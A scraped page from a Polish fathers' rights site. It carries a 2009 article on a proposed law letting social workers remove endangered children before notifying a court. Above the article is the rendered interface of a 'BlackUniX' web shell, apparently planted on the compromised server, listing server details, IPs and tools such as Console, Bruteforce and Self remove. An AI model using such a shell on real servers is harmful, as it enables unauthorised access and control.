W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:55:22
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Policja rodzinna
29.01.2009.
Projekt nowelizacji ustawy o przeciwdziałaniu przemocy w rodzinie – przygotowany przez Ministerstwo Pracy – daje 15 tysiącom pracowników socjalnych szerokie uprawnienia. Będą mogli zabrać rodzicom dzieci, jeżeli stwierdzą, że ich życie lub zdrowie jest zagrożone. Sąd zawiadomią później. Projekt może byc przyjęty już w przyszłym tygodniu przez rząd.
Obok zakazu bicia dzieci znalazło się w nim także upoważnienie pracowników socjalnych do odbierania dzieci rodzicom.Chodzi o sytuacje bezpośredniego zagrożenia dla życia lub zdrowia dziecka, zwłaszcza gdy opiekun jest nietrzeźwy lub pod wpływem środka odurzającego.

Czy oddanie tak dużej władzy w ręce często niedoświadczonych, młodych pracowników socjalnych nie będzie nadużywane? Tym bardziej, że będzie to można zrobić bez zgody sądu, którymoże zostać powiadomiony najpóźniej 24 godziny po fakcie. Pomyłki mogą być przecież w swoich skutkach bardzo bolesne.
Marzena Bartosiewicz, ekspert Ministerstwa Pracy twierdzi jednak, że czasem lepiej popełnić błąd, niż mieć na sumieniu życie dziecka. Ten przepis ma jej zdaniem na celu pomoc ofiarom i nie można z góry zakładać złej woli ludzi, którzy pracują dla dobra rodzin.
Trudne rodzinne sprawy. Podobnego zdania jest rzecznik praw dziecka. W najbliższych dniach rzecznik praw dziecka skieruje wystąpienie do prezesa Rady Ministrów Donalda Tuska, w którym zaapeluje o przyspieszenie prac legislacyjnych nad nowelizacją.

Obecnie Dopiero w bezpośrednim zagrożeniu życia lub zdrowia dziecka policja może zająć się nim i przekazać rodzinie zastępczej (ta zawiadamia sąd). Każdy natomiast, także pracownik socjalny, ma prawo, a nawet obowiązek, zawiadomić policję o takim przypadku.
Niektórzy specjaliści twierdzą, ze w sytuacji gdy wielu pracowników socjalnych ma przeciętne wykształcenie albo odległe wykształcenia psychologicznego i w dodatku to ludzie młodzi, bez dzieci i doświadczenia,  to ich decyzje powinny podlegać także kontroli sądów administracyjnych.


 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.